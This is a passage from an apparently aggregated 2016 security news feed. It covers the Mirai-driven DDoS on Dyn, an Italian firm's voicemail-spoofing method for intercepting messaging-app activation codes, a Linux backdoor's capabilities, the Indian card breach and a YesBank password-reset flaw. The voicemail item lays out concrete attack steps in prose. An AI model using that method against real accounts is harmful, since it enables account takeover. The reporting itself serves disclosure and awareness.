“Hackers have long sold access to botnets, though haven’t explicitly advertised their use of IoT devices like connected cameras, fridges and kettles. The infamous LizardSquad amassed sizeable botnets for its LizardStresser “booter” – a DDoS weapon for hire – but it largely compromised vulnerable routers.” reported FORBES.
IoT vendors are warned of future risks of cyber attacks, the Chinese manufacturer of surveillance and home video devices targeted by the Mirai botnet, Xiongmai Technology (XM), has pushed out parched to avoid the hacking of its devices.
However, any device running firmware released before September 2015 that is still using the default username and password (well known in the hacker community) remains vulnerable to attacks that use the credentials to access the devices via Telnet.
Attacks like the one powered by the IoT botnet on Friday are difficult to mitigate, anyway, the adoption of a secondary, back-up DNS provider could make hard for the attacker to shut down the web service.
Other countermeasures are listed in the FORBES blog post.
InTheCyber discovered a serious flaw in messaging systems
24.10.2016 securityaffairs Mobil
Researchers at InTheCyber firm have discovered a new easy exploitable and dangerous vulnerability affecting messaging systems.
InTheCyber – Intelligence & Defense Advisors (www.inthecyber.com), a leader in offensive & Defensive Cyber Security, has discovered in its R&D Labs a new easy and dangerous vulnerability affecting messaging systems.
Voicemail caller-id spoofing it’s a quite old flaw. When the mobile operator relies on caller-id to authenticate the user inside his voicemail, an attacker could falsify his caller-id in order to impersonate the user and gain access to his voicemail. At the moment, two of the biggest Italy mobile operators allow this kind of attack.
This undoubtedly raises problems about the privacy of the communications, especially the information stored inside the voicemail. Moreover, this old flaw could be weaponized in order to compromise other services.
For example, Telegram, WhatsApp, and Signal, when an activation code is requested, as start forward an SMS with the activation code. If the code is not entered promptly, these services resend the activation code through an automated call.
Depending on the configuration of the voicemail of the user, the authentication code will be inside his voicemail in the following scenarios: user does not respond, the user is not reachable, the user is occupied. In the first scenario, an attacker could try to ask an activation code using the victim account during the night-time. In the second scenario, an attacker could send multiple Silent-SMS to the user in order to determine when the phone is detached from the network and start the attack. In the third, a telephone scam could be used during the attack to keep the phone busy.
In the first scenario, an attacker could try to ask an activation code using the victim account during the night-time. In the second scenario, an attacker could send multiple Silent-SMS to the user in order to determine when the phone is detached from the network and start the attack. In the third, a telephone scam could be used during the attack to keep the phone busy.
In the second scenario, an attacker could send multiple Silent-SMS to the user in order to determine when the phone is detached from the network and start the attack. In the third, a telephone scam could be used during the attack to keep the phone busy.
Besides caller-id spoofing often voicemail services rely on default or a guessable pin to authenticate a user, for example, when he tries to access his voicemail from another phone number.
Basically, if the voicemail is somehow accessible by an unauthorized person, and if no two-actor authentication is enabled, every service that relies on an automated call to send an activation code is hijackable.
Below a video PoC of the hack
Terrorism activity continues unabated – Tower of Babel under the surface
24.10.2016 securityaffairs Crime
This increase of the activity led Intel experts at Global Intelligence Insight to raise the level of terrorism threat in Italy to #1.
With the eyes of the world set on the American Presidential elections on one side, and on Aleppo, Mosul and most recently Kirkuk on the other, underneath the online surface of the internet, multilingual jihadist channels and chat rooms spread like wildfire on protected, private and invite-only platforms, such as Telegram or ChatSecure.
Besides the usual terrosism and pro-violence propaganda and gore videos of executions portraying jihadists as rock stars proudly holding AK’s and explosive vests (some of them children aged no more than 7-9), it’s noticeable the growing urgency of these radicals to widen the reach of their message to more countries – always contemplating the goal of converting lone wolves (often described as “turbo conversions”, considering how rapidly it’s been happening), and the planning of operations, including how to get the logistics set up. Hence the relevance of language.
The geography of attack planning is strictly connected with the increasing activity and use of a certain language in both channels and chat groups.
Portuguese from Portugal, Italian, Urdu and Bengali are the most recent focuses (English and French are always a given).
Through our 24/7 monitoring and active infiltration in these hundreds of chatrooms, we can establish several types of correlations between the users, and extrapolate conclusions with quantifiable data. Some of the most recent ones are quite surprising even to our most experienced analysts.
Lately, we have identified a rapid and aggressive adherence to Italian channels. As an example, a recently created Italian channel had an increase of 430 active members in just 36 hours, and this uncommon pattern made several alarms ring all over our offices.
We are talking about gatekeepers, operatives displaying tactical experience and a general population of sympathizers to the Salafi jihadist cause, communicating and sharing propaganda and battlefront news in fluent Italian.
This increase of terrorism linked activity led us to raise the level of threat in Italy to Tier #1, and look out for any kind of undergoing operation.
There are also many other types of transversal trends that we analyze and correlate, to validate a certain conclusion, such as the most recent and growing concern on communicating in the most secure and anonymous way possible. The release of detailed and complex manuals by the so-called “Islamic OPSEC IT Team”, with contents clearly developed by IT professionals, is a clear illustration of this fact.
And with the self-proclaimed Islamic State being gradually strangled in both Syria and Iraq, suffering heavy casualties North and South, many seasoned veterans are already trying to make their way to Europe. The idea of having a command center physically set and issuing instructions – a notion to which several intelligence companies still tend to linger – is completely obsolete.
This war’s most urgent frontline, is still – and will continue to be – online.
NOTE: This brief article is a part of a full intelligence assessment developed by Global Intelligence Insight.
Paolo Cardoso, MA – With over 10 years of experience in Public Diplomacy and Business Intelligence, and having developed several strategic investment projects in the fields of Security, Defense and Energy in Kosovo, Bulgaria, Poland, Ukraine, Armenia, Georgia and Russian Federation, today he is the President and Co-founder of the Portuguese Euro-Atlantic Diplomacy Agency, and an Intelligence Analyst at Global Intelligence Insight.
American hacker The Jester defaced a Russian Government website
23.10.2016 securityaffairs Hacking
The popular American hacker The Jester defaced a Russian Government website in retaliation for the recent attacks against US targets.
We are in the middle of a battle in the cyberspace, with the advent of Presidential elections experts observed an intensification of the hacking attacks.
While hackers target parties and personnel involved in the Presidential campaigns, the US Government threatens Russia is blaming its cyber army for the attacks.
There aren’t only nation state actors involved in the battle, there are also hacktivists and patriotic hackers that could power cyber attacks against the adversary.
This week, hackers from NewWorldHackers crew and Anonymous targeted the Dyn DNS service to launch a message to Russia, and in the same hours, the notorious American cyber vigilante The Jester has defaced the website of the Russian Ministry of Foreign Affairs, MID.ru.
The hack was not so complicated for the expert hacker that has found a flaw in the website and exploited it to hack the Russian Government portal.
The Jester targeted the website of the Russian Government in retaliation for attacks against the American entities.
The popular hacker gained access to the Russian government ministry’s website and posted the following message:
“Stop attacking Americans.”
“Comrades! We interrupt regular scheduled Russian Foreign Affairs Website programming to bring you the following important message,” he wrote. “Knock it off. You may be able to push around nations around you, but this is America. Nobody is impressed.”
“His hacking of the website included this gag: Visitors are subjected to the ear-piercing sound of an American civil alert message — that shrieking dial tone that accompanies emergency weather broadcasts.” reported the CNNmoney.
The Jester sent a message to President Putin to blame him for lying about the involvement of Russian hackers in the recent attacks against the American organizations.
“Let’s get real, I know it’s you, even if by-proxy, and you know it’s you,” he wrote. “Now, get to your room. Before I lose my temper.”
Segui
JΞSTΞR ✪ ΔCTUAL³³º¹ @th3j35t3r
#ICYMI MSG 'From Russia with Love' - I'm Jester & I approve this message via the Russian Foreign Affairs Website >> http://bit.ly/2egvpiM
20:32 - 22 Ott 2016
81 81 Retweet 151 151 Mi piace
In the past, The Jester vigilante has conducted several operations against jihadist communities online. The popular hacker said the CNNMoney journalists he chose to attack the Russian Government Website in response to the massive DDoS against the Dyn DNS service that cut off a large portion of US netizens from the Internet.
“I wanted to poke them in the eye and stop feeling like US is just taking it on the chin. Again,” he said. “I’m not gonna sit around watching these f—-rs laughing at us.”
“It’s 4 a.m. in Moscow right now and a weekend. I’m hoping they can’t fix the hole til Monday,” he said.
“Think of this as a professional courtesy,” his public warning states. “Or if you prefer message from ‘USA with love.'”
Linux.BackDoor.FakeFile.1, a new Linux backdoor in the wild
23.10.2016 securityaffairs Virus
Security researchers at the security firm Doctor Web have spotted a new Linux backdoor dubbed Linux.BackDoor.FakeFile.1 in the wild.
Security firms continue to observe an increasing number of malware specifically designed to target Linux-based systems.
Linux, like any other Operating System, could be infected by malicious codes designed to compromise the hosts and gain the control over them.
Linux architectures are everywhere; it is quite easy for crooks to find vulnerable Linux servers exposed on the Internet or poorly designed Internet of Things devices that are not properly configured or protected.
It is normal for cyber criminals focus their efforts on hacking Linux systems too. Linux malware is a natural evolution of the threat landscape because the Linux OS is preferred platform within data centers, cloud infrastructure for businesses, and application servers.
Linux is also the core of Android devices and many other embedded systems.
The last malware observed in the wild is Linux.BackDoor.FakeFile.1, it was spotted by experts at security firm DrWeb.
The Linux.BackDoor.FakeFile.1 Trojan spreads through PDF, Microsoft, or Open Office documents.
When the victims launch trigger the execution of the malware, it saves itself to the folder .gconf/apps/gnome-common/gnome-common in the user’s home directory.
Then the Linux.BackDoor.FakeFile.1 search for a hidden file, whose name matches the file name of the malware, and replaces the executable file with its code.
“For instance, if an ELF file of Linux.BackDoor.FakeFile.1 is named AnyName.pdf, the Trojan will search for a hidden file under the name .AnyName.pdf and then replace the original file with it by using the command mv .AnyName.pdf AnyName.pdf. If the file is not found, Linux.BackDoor.FakeFile.1 creates it and opens it in the program gedit.” reads the analysis published by DrWeb.
linux backdoor Linux.BackDoor.FakeFile.1
The malware checks the installed Linux distribution, for every distro that is not the openSUSE, it writes a command to the file <HOME>/.profile or the file <HOME>/.bash_profile to gain persistence. The next step it the retrieving of the configuration data from its file and its decryption, then the Trojan launches the following threads:
A first thread shares communicate with the command and control (C&C) server.
A second thread monitors the duration of the connection that will be shut down after 30 minutes without activity.
Below the complete list of the Linux.BackDoor.FakeFile.1 abilities:
Send the C&C server the quantity of messages transferred during the session;
Send a list of the contents of the specified folder;
Send the C&C server the specified file or a folder with all its contents;
Delete a directory;
Delete a file;
Rename a folder;
Remove itself;
Launch a new copy of a process;
Close the current session;
Establish backconnect and run sh;
Terminate backconnect;
Open the executable file of the process for writing;
Close the process file;
Create a file or folder;
Write the transmitted values to a file;
Obtain the names, permissions, sizes, and creation dates of files in the specified directory;
Set 777 privileges on the specified file;
Terminate the backdoor’s operation.
The researchers from DrWeb highlighted that the Linux.BackDoor.FakeFile.1 does not require root privileges to work, it operates with the current user rights.
Technical details of this Linux backdoor are available here.
NewWorldHacking and Anonymous behind massive DDoS attack on Dyn DNS service
22.10.2016 securityaffairs Attack
NewWorldHacking & Anonymous powered the massive DDoS attack against the Dyn DNS service that caused a serious Internet outage for many netizens.
The cyber attacks against the Dyn DNS service that affected a huge portion of Internet users in the US is monopolizing the media.
IT security experts have no doubts, hackers powered the massive DDoS attack with a huge botnet composed of IoT devices infected by the Mirai malware.
We are all trying to discover who is behind the attack and which is its motivation. On Friday, while the massive DDoS attack was creating the panic among netizens on the Internet, WikiLeaks invited its supporters to stop the offensive.
Visualizza l'immagine su Twitter
Segui
WikiLeaks ✔ @wikileaks
Mr. Assange is still alive and WikiLeaks is still publishing. We ask supporters to stop taking down the US internet. You proved your point.
23:09 - 21 Ott 2016
45.110 45.110 Retweet 30.150 30.150 Mi piace
WikiLeaks confirmed that its supporters launched the massive DDoS attack to protest against the decision of the Ecuadorian government’s to cut off the Internet connection of the WikiLeaks founder Julian Assange due to the US Political election leaks.
Yesterday evening I reached the hacking collective NewWorldHacking via Twitter asking them more information about the attack.
The hackers confirmed me that they started the massive attack against the Dyn DNS service, anyway, they were not alone.
According to the NewWorldHacking, many other groups linked to the Anonymous collective participated in the attack.
When I asked which Anon groups were involved they replied me that many crews targeted the Dyn DNS service.
“Anonymous, Pretty much all of Anonymous” sais NewWorldHacking.
They confirmed me that they are testing the capability of their botnet, highlighting that the DDoS attack against the Dyn DNS Service was carried with the Mirai botnet alongside with other booters.
Most interesting is the motivation that they provided me. Not only the Assange’s case. They told me that the attack is also a message for the Russian Government.
“If Russia is against the U.S we are against Russia. This is were we draw the line, we are sending a warning message to Russia. “
The information I collected seems to be in line with the statements that the hacktivist groups Anonymous and the NewWorldHacking released to the Politico.
Indian Banks fear a security breach that affected up to 3.25 million cards
22.10.2016 securityaffairs Crime
A number of Indian banks are adopting extraordinary measures fearing a security breach that could have exposed as many as 3.25 million debit cards.
A number of Indian banks are adopting extraordinary measures fearing a security breach that could have exposed as many as 3.25 million debit cards (0.5 percent of the nearly 700 million debit cards issued by banks in India).
“A slew of banks in India are replacing or asking their customers to change security codes of as many as 3.25 million debit cards due to fears that the card data may have been stolen in one of the country’s largest-ever cyber security incidents.” reported the Reuters.
In September, several banks’ customers reported to Visa, Mastercard, and RuPay (National Payments Corp of India (NPCI)) fraudulent activities involving their debit cards. According to the chief of NPCI, the fraudulent transactions spotted by the clients were prevalently observed in China and the United States.
A.P. Hota, NPCI Chief Executive, explained that one of the payment switch provider’s systems might have been compromised. Giving a close look at the numbers behind this security breach that involved some 90 ATMs, 2.65 million are on Visa and MasterCard platforms.
Both Visa and Mastercard issued a statement to confirm that their networks had not been hacked and confirmed their support to the ongoing investigation.
The switches are crucial components of the back-end network of a bank and are involved in ordinary ATM operations.
The card network providers already reported the issue to the affected banks that decided as a preventive measure to replace customers’ cards.
“Necessary corrective actions already have been taken and hence there is no reason for bank customers to panic.” said Hota downgrading the problem.
According to the Reuters, the NPCI did not disclose the name of the payment switch provider who was compromised, however, banking industry sources revealed that the financial institution is the Hitachi Ltd subsidiary Hitachi Payment Services, which manages ATM network processing for Yes Bank Ltd.
Yes Bank issued a statement to confirm it is reviewing the security, but its experts haven’t found any anomaly.
The State Bank of India promptly blocked debit cards of some customers after and now it was replacing those cards to prevent fraudulent activities.
The Reuters provided further details about a possible impact on the Indian bank customers:
“Complaints of fraudulent cash withdrawals affected a total 641 customers of 19 banks, and the money involved was 13 million rupees ($194,612), according to NPCI.” reported the Reuters.
“ICICI Bank (ICBK.NS), HDFC Bank (HDBK.NS) and Axis Bank (AXBK.NS) – the top three private sector lenders – confirmed in separate statements some of their customers’ card accounts had been possibly breached after use at outside ATMs. The banks said they had advised the clients to change their PINs.”
“Standard Chartered’s (STAN.L) Indian unit has also begun to re-issue debit cards for some customers”
An Army of Million Hacked IoT Devices Almost Broke the Internet Today
22.10.2016 thehackernews Hacking
A massive Distributed Denial of Service (DDoS) attack against Dyn, a major domain name system (DNS) provider, broke large portions of the Internet on Friday, causing a significant outage to a ton of websites and services, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify.
But how the attack happened? What's the cause behind the attack?
Exact details of the attack remain vague, but Dyn reported a huge army of hijacked internet-connected devices could be responsible for the massive attack.
Yes, the same method recently employed by hackers to carry out record-breaking DDoS attack of over 1 Tbps against France-based hosting provider OVH.
According to security intelligence firm Flashpoint, Mirai bots were detected driving much, but not necessarily all, of the traffic in the DDoS attacks against DynDNS.
Mirai is a piece of malware that targets Internet of Things (IoT) devices such as routers, and security cameras, DVRs, and enslaves vast numbers of these compromised devices into a botnet, which is then used to conduct DDoS attacks.
Since the source code of Mirai Botnet has already made available to the public, anyone can wield DDoS attacks against targets.
This time hackers did not target an individual site, rather they attacked Dyn that many sites and services are using as their upstream DNS provider for turning internet protocol (IP) addresses into human-readable websites.
The result we all know: Major sites and services including Twitter, GitHub, Reddit, PayPal, Amazon, AirBnb, Netflix, Pinterest, and so on, were among hundreds of services rendered inaccessible to Millions of people worldwide for several hours on Friday.
"Flashpoint has confirmed that at least some of the devices used in the Dyn DNS attacks are DVRs, further matching the technical indicators and tactics, techniques, and procedures associated with previous known Mirai botnet attacks," Flashpoint says in a blog post.
This type of attack is notable and concerning because it largely consists of unsecured IoT devices, which are growing exponentially with time. These devices are implemented in a way that they cannot easily be updated and thus are nearly impossible to secure.
Manufacturers majorly focus on performance and usability of IoT devices but ignore security measures and encryption mechanisms, which is why they are routinely being hacked and widely becoming part of DDoS botnets used as weapons in cyber attacks.
An online tracker of the Mirai botnet suggests there are more than 1.2 Million Mirai-infected devices on the Internet, with over 166,000 devices active right now.
In short, IoT botnets like Mirai are growing rapidly, and there is no easy way to stop them.
According to officials speaking to Reuters, the US Department of Homeland Security (DHS) and the FBI are both investigating the massive DDoS attacks hitting DynDNS, but none of the agencies yet speculated on who might be behind them.
Massive DDoS attack against Dyn DNS service, how and why
22.10.2016 securityaffairs Attack
A massive DDoS attack targeted the Dyn DNS service and caused an extended Internet outage. How the attackers powered the attack?
Yesterday a massive DDoS attack targeted the DNS service of the Dyn company, one of the most authoritative domain name system (DNS) provider, and caused an extended Internet outage. A large portion of Interner users was not able to reach most important web services, many websites like including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify were down for netizens in the US.
What happened? Who his behind the attack?
The fear of cyber attack on a global scale brought people in the panic, yesterday a large portion of users have probably understood that the Internet architecture is a resource that could be targeted by hackers with serious and unpredictable consequences.
But how the attack happened? What’s the cause behind the attack?
We still ignore the exact dynamic of the attack, neither who is the responsible, the unique certainty is that the Dyn DNS Service was flooded by a devastating wave of requests originated by million of compromised IoT devices. The Dyn company reported a huge army of hijacked Internet of Things devices could be abused by attackers to power the massive DDoS attack.
The news confirmed the dangerous trend observed in the recent attacks against the Brian Krebs’s website and the French hosting provider OVH that peaked 1Tbps.
The security intelligence firm Flashpoint published an interesting post on the massive DDoS in which confirm that its experts have observed the Mirai bots driving the attack against DynDNS.
“Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware. Mirai botnets were previously used in DDoS attacks against security researcher Brian Krebs’ blog “Krebs On Security” and French internet service and hosting provider OVH.” reads the analysis published by Flashpoint “Mirai malware targets Internet of Things (IoT) devices like routers, digital video records (DVRs), and webcams/security cameras, enslaving vast numbers of these devices into a botnet, which is then used to conduct DDoS attacks. “
Below the Key Findings of the report published by Flashpoint
Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware.
Mirai botnets were previously used in DDoS attacks against the “Krebs On Security” blog and OVH.
As of 1730 EST, the attacks against Dyn DNS are still ongoing. Flashpoint is coordinating with multiple vendors and law enforcement to track the infected devices that constitute the botnet being used to conduct these attacks.
This is not surprising if we consider that the source code of the botnet was leaked of the popular criminal hacker forum Hackforum earlier October by a user with moniker “Anna-senpai” that shared the link to the source code of the malware “Mirai.”
“The leak of the source code was announced Friday on the English-language hacking community Hackforums. The malware, dubbed ‘Mirai’ spreads to vulnerable devices by continuously scanning the Internet for IoT systems protected by factory default or hard-coded usernames and passwords.” reported Krebs.
The Mirai Botnet was first spotted by the researcher MalwareMustDie this summer targeting IoT devices, it mainly targets connected objects such as routers, CCTV, and DVRs.
The Mirai malware target Internet of Things (IoT) devices using the credential factory settings, a circumstance that is quite common in the wild.
The availability of the source code of Mirai Botnet in the wild theoretically made possible everyone to power a botnet.
I confess you that I believe the leak of the source code of such kind of botnet could be also part of a wider strategy of a certain category of attackers that intend to power massive attacks making impossible the attribution.
Watch out! The Mirai botnet that powered the attack against the Dyn DNS service is not the same used against Krebs’s site and OVH.
“While Flashpoint has confirmed that Mirai botnets were used in the October 21, 2016 attack against Dyn, they were separate and distinct botnets from those used to execute the DDoS attacks against “Krebs on Security” and OVH. Earlier this month, “Anna_Senpai,” the hacker operating the large Mirai botnet used in the Krebs DDoS, released Mira’s source code online.” continues Flashpoint “Since this release, copycat hackers have used the malware to create botnets of their own in order to launch DDoS attacks.”
It is unknown if the attacks against Dyn DNS are linked to the DDoS attacks against Krebs, OVH, or other previous attacks.
The attack against a DNS aims to obtain a wide effect, in the specific case many sites and services are using Syn as their upstream DNS provider.
If you are interested to know more about the diffusion of the Mirai Botnet you can use this online tracker that reports more than 1.2 Million connected devices infected by the Mirai code in the wild.
According to the Reuters, the US Department of Homeland Security (DHS) and the FBI are both investigating the massive DDoS attacks against the Dyn DNS service.
We have no indication about the possible culprit, I personally believe that the leakage of the Mirai botnet in the wild and this last massive attack have something in common and there is a specific strategy of a persistent attacker behind the events.
Chinese hackers targeted officials visiting the USS Ronald Reagan vessel
22.10.2016 securityaffairs Hacking
Experts from the cyber security firm FireEye discovered a spear phishing campaign launched against visitors to the Ronald Reagan vessel in South China Sea.
Chinese hackers targeted foreign government personnel who visited a US aircraft carrier the day before a contentious international court ruling on the South China Sea,
According to the FireEye cyber security firm, Chinese hackers targeted US aircraft carrier. The hackers launched an attack against visitors to a US vessel the day before (July 11, 2016) a contentious international court ruling on the South China Sea.
According to the experts at the FireEye’s iSight unit, the Chinese hackers powered a spear phishing attack that leveraged on messages with a malicious document as an attachment. The document impersonating an official message addressed to officials visiting the USS Ronald Reagan, a nuclear-powered aircraft carrier which conducted patrols of the South China Sea in July.
The document appears as an official message that was sent to officials visiting the nuclear-powered aircraft carrier USS Ronald Reagan. The Ronald Reagan aircraft carrier was used by the US Government to patrol the South China Sea in July.
The document allowed the attacker to infect victims with the Enfal malware, which can be used by attackers as a spyware or to download further malicious payloads on the machine.
According to FireEye, the same hackers are responsible for other attacks against US and Vietnamese national defence computer networks.
The Financial Times that reported the discovery made by FireEye, confirmed the absence of direct evidence to link the attack to a Chinese nation-state actor.The researcher discovered that the command and control server used by the attacker was already used in the past by the China-based group.
“Many governments and militaries in Southeast Asia lack cyber security controls that can effectively match these elevated threats,” said Bryce Boland, FirEye’s Asia-Pacific chief technology officer.
“For example, personal webmail and unmanaged devices aren’t unusual, and many organisations lack the technology to detect unique attacks which haven’t been seen before.”
At the time I was writing it is still unclear if hackers have compromised classified information, nor that the hackers have interfered with the vessel’s operations in the South China Sea.
“The official said unclassified information about logistics was often shared with contractors and foreign governments to support port visits for ships.” reported the FT.
Velká kartová loupež miliónů bankovních údajů. Stopy vedou do Číny
22.10.2016 Novinky/Bezpečnost Kriminalita
Prostřednictvím počítačového viru, který cílil přímo na bankomaty a platební terminály v obchodech, se kyberzločinci dostali k více než 3,2 miliónu detailních informací o platebních kartách. Snadno tak mohou získané údaje zneužít k neoprávněným platbám a výběrům z cizích účtů. Podle serveru The Hacker News jde o vůbec největší zaznamenanou krádež tohoto druhu.
Odhalit nasazení viru, prostřednictvím kterého se počítačoví piráti dostali k detailním informacím o platebních kartách, se podařilo v Indii. Kyberzločinci dokázali obelstít zabezpečení prakticky všech tamních velkých finančních institucí – Státní indické banky (SBI), HDFC, Yes Banky, ICICI a Axisu.
To nicméně neznamená, že v ohrožení jsou uživatelé pouze v Indii. Při pohledu na pečlivou práci počítačových pirátů je totiž velmi pravděpodobné, že podobným způsobem se snažili získávat informace o kartách také v dalších koutech světa.
Prostřednictvím nezvaného návštěvníka zjistili útočníci přinejmenším PIN kód, číslo karty i jméno majitele karty.
Zda škodlivý kód skenoval jen samotnou kartu, nebo se rovněž napíchnul přímo na komunikaci mezi terminálem a bankou, zatím vyšetřovatelé neprozradili. Je tedy vcelku možné, že útočníci mají k dispozici daleko více informací o odcizených kartách.
Jak se viry dostaly do bankomatů?
Server The Economic Times upozornil také na to, že vyšetřovatelům se sice podařilo nezvaného návštěvníka odhalit, doposud však nedokázali zjistit, jak se do bankomatů a platebních terminálů dostal.
Zarážející je především to, že se kyberzločincům podařilo obelstít bezpečnostní systémy různých finančních institucí.
Jediným vodítkem vyšetřovatelů je zatím použitá platební platforma. Prakticky všechny dotčené banky totiž používaly systémy od společnosti Hitachi.
Ukradeno bylo dohromady 3,2 miliónu detailních informací o platebních kartách, z toho ve 2,6 miliónu případů jde o karty od společností Visa a Mactercard. Zbylých 600 tisíc odcizených údajů pak tvoří indická platforma RuPay.
Jak dlouho měli počítačoví piráti přístup k bankovním systémům, není zatím jasné.
Stopy vedou do Číny
Stopy útoku vedou podle vyšetřovatelů do Číny. Právě v nejlidnatější zemi planety totiž byly z postižených účtů vybrány neoprávněně peníze. Rozsah škod však jednotlivé finanční domy zatím ještě nevyčíslily. S ohledem na množství odcizených karet však pravděpodobně nepůjde o žádné nízké částky.
Dotčené banky již na hrozbu zareagovaly. Některé finanční instituce doporučily uživatelům neprodleně změnit PIN kódy ke svým kartám, jiné začaly karty rovnou blokovat.
Uživatelé se tak sice ke svým penězům nedostanou tak snadno, na druhou stranu se k nim nedostanou ani počítačoví piráti. Nové karty budou uživatelům vystaveny samozřejmě zdarma.
Massive DDoS Attack Against Dyn DNS Service Knocks Popular Sites Offline
21.10.2016 thehackernews Attack
Massive DDoS Attack Against Dyn DNS Service Knocks Popular Sites Offline
Cyber attacks are getting evil and worst nightmare for companies day-by-day, and the Distributed Denial of Service (DDoS) attack is one such attacks that cause a massive damage to any service.
Recently, the Internet witnessed a record-breaking largest DDoS attack of over 1 Tbps against France-based hosting provider OVH, and now the latest victim of the attack is none other than Dyn DNS provider.
A sudden outage of popular sites and services, including Twitter, SoundCloud, Spotify, and Shopify, for many users, is causing uproar online. It's because of a DDoS attack against the popular Domain Name System (DNS) service provider Dyn, according to a post on Ycombinator.
DNS act as the authoritative reference for mapping domain names to IP addresses. In other words, DNS is simply an Internet's phone book that resolves human-readable web addresses, like thehackernews.com, against IP addresses.
Dyn DNS is used by many websites and services as their upstream DNS provider, including Twitter, Spotify, SaneBox, Reddit, Box, Github, Zoho CRM, PayPal, Airbnb, Freshbooks, Wired.com, Pinterest, Heroku and Vox Media properties.
All of these sites and services are reportedly experiencing outages and downtime, either completely or partially.
Here's an internet outage map from Level3:
dyn-dns-ddos-attack
According to Dyn DNS, the DDOS started at 11:10 UTC and is mostly affecting its customers in the East Coast of the United States, specifically Managed DNS customers.
"We are aware of the ongoing service interruption of our Managed DNS network. For more information visit our status page," Dyn tweeted.
At the time, it's not clear who is behind this DDoS attack, but the company said its engineers are working on "mitigating" the issue.
Here's the statement posted by Dyn on its website:
"This attack is mainly impacting US East and is impacting Managed DNS customers in this region. Our Engineers are continuing to work on mitigating this issue.
Starting at 11:10 UTC on October 21th-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.
Customers with questions or concerns are encouraged to reach out to our Technical Support Team."
What websites are down for you? Let us know in the comments below.
We'll update the story as soon as we get to hear more about the attack. Stay Tuned!
US users were not able to reach Twitter and other sites due to DDoS on Dyn DNS Service
21.10.2016 securityaffairs Attack
A severe distributed denial-of-service (DDoS) it targeting the Managed DNS infrastructure of cloud-based Internet performance management company Dyn.
A severe distributed denial-of-service (DDoS) it targeting the Managed DNS infrastructure of cloud-based Internet performance management company Dyn.
Many users of major websites are not able to reach web services such as Twitter, GitHub, The list of affected websites includes Twitter, Etsy, GitHub, Soundcloud, PagerDuty, Spotify, Shopify, Airbnb, Intercom, and Heroku.
GitHub has notified its users that its upstream DNS provider is suffering a serious issue. In some region of the planet Twitter.com was not accessible, as reported by SecurityWeek
“At the time of writing, website availability services show that Twitter.com has been down for roughly two hours.” states a blog post published by SecurityWeeks.
Dyn confirmed the DDoS attack against its DNS service that started at 11:10 UTC. The company is still working on mitigating the attack.
“Services have been restored to normal as of 13:20 UTC.
This attack is mainly impacting US East and is impacting Managed DNS customers in this region. Our Engineers are continuing to work on mitigating this issue.
Posted about 1 hour ago.
Starting at 11:10 UTC on October 21st-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.”
The attack seems to have no impact on the European and Asian Users, I live in Italy and here we had no problems in reaching the affected websites.
DDoS attacks continue to represent a serious threat against the web services and the overall Internet infrastructure.
Recent attacks powered by the Mirai botnet reached a magnitude never seen before, the attack targeting hosting provider OVH last month peaked 1 Tbps.
Early September the popular cyber security expert Bruce Schneier published an interesting post titled “Someone Is Learning How to Take Down the Internet” that reveals an escalation of cyber attacks against service providers and companies responsible for the basic infrastructure of the Internet.
We are referring to coordinated attacks that experts consider a sort of tests to evaluate the resilience of most critical nodes of the global Internet. The attacks experienced by the companies request a significant effort and huge resources, a circumstance that suggests the involvement of a persistent attacker like a government, and China is the first suspect.
“Recently, some of the major companies that provide the basic infrastructure that makes the Internet work have seen an increase in DDoS attacks against them. Moreover, they have seen a certain profile of attacks. These attacks are significantly larger than the ones they’re used to seeing. They last longer. They’re more sophisticated. And they look like probing.” wrote Schneier.
“I am unable to give details, because these companies spoke with me under a condition of anonymity. But this all is consistent with what Verisign is reporting. Verisign is the registrar for many popular top-level Internet domains, like .com and .net. If it goes down, there’s a global blackout of all websites and e-mail addresses in the most common top-level domains. Every quarter, Verisign publishes a DDoS trends report. While its publication doesn’t have the level of detail I heard from the companies I spoke with, the trends are the same: “in Q2 2016, attacks continued to become more frequent, persistent, and complex.”
It is clear that attackers aim to cause a global blackout of the most common top-level domains paralyzing a large portion of the Internet.
Schneier, who has spoken with companies that faced the attacks, pointed out powerful DDoS attacks that attacks that stand out of the ordinary for their methodically escalating nature.
Cyber Criminal can easily get access to your YesBank Internet Banking using stolen Debit/Credit Card Number and PIN
21.10.2016 securityaffairs Cyber
A security researcher disclosed a vulnerability in the online banking service of the YesBank that promptly fixed the issue.
I am a customer of YesBank and I hold my savings account with them. I also use the YesBank’s online banking application and I strongly feel that the application of the bank must be secured. So, as a responsible client, I disclosed the vulnerability to YesBank which I recently found in their application. And I would like to thank YesBank for fixing this issue immediately.
For those who do not know about YesBank, you can read about the bank on wiki.
“YES BANK is India’s fifth largest private sector Bank, founded in 2004. Yes Bank is the only Greenfield Bank licence awarded by the RBI in the last two decades. YES BANK is a “Full Service Commercial Bank”, and has steadily built a Corporate, Retail & SME Banking franchise, Financial Markets, Investment Banking, Corporate Finance, Branch Banking, Business and Transaction Banking, and Wealth Management business lines across the country.”
Introduction
I regularly perform the penetration testing on applications at SecureLayer7 and recently, I stumbled on a very simple bug in the YesBank online banking application (referred as YesBank in the remaining article). YesBank provides a good number of features to million of banking users. Among these features, I found that the user account password reset feature was vulnerable to one of the OWASP’s Top 3 vulnerability, i.e. Injections.
This vulnerability is caused by poor input validation of the application. Consequently, attacker can exploit this vulnerability to bypass the OTP process to reset the bank account password. To exploit this vulnerability, attacker needs the information of the victim bank account, for example their ATM number, ATM Pin, etc.
Several Indian banks are issuing an advisory to their customers, asking them to change their security code (more popularly known as ATM pin) or better replace the card, by Indian media reports
Once the attacker gathers all the information required to exploit this vulnerability, he can gain the access to the Online Banking Application account by resetting the original password of the user.
The Proof of Concept
To execute the payload successfully switch OFF or turn ON the flight mode of the mobile. (Banking user information is blurred for security reasons)
Vulnerability Timeline:
1) Vulnerability reported on 21st of Sept, 2016 to YesBank
2) Re-tested Vulnerability on 20th October 2016 and it was patched
Takeway:
